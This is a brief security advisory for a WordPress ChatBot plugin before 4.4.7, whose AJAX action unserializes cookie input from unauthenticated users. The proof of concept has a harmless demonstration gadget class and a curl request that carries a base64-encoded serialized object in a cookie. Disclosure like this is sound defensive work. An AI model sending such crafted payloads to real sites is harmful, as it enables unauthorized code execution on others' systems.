ChatBot < 4.4.7 - Unauthenticated PHP Object Injection

The plugin unserializes user input from cookies via an AJAX action available to unauthenticated users, which could allow them to perform PHP Object Injection when a suitable gadget is present on the blog

PoC

To simulate a gadget chain, put the following code in a plugin: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Then, when a GPT engine is set as Open AI model in the settings (/wp-admin/admin.php?page=wpbot_openAi), make the below request to trigger the unserialisation: curl -X ‘POST’ -b ‘last_five_prompt=Tzo0OiJFdmlsIjowOnt9’ ‘https://example.com/wp-admin/admin-ajax.php?action=openai_response’ Tzo0OiJFdmlsIjowOnt9 being the base64 of O:4:“Evil”:0:{}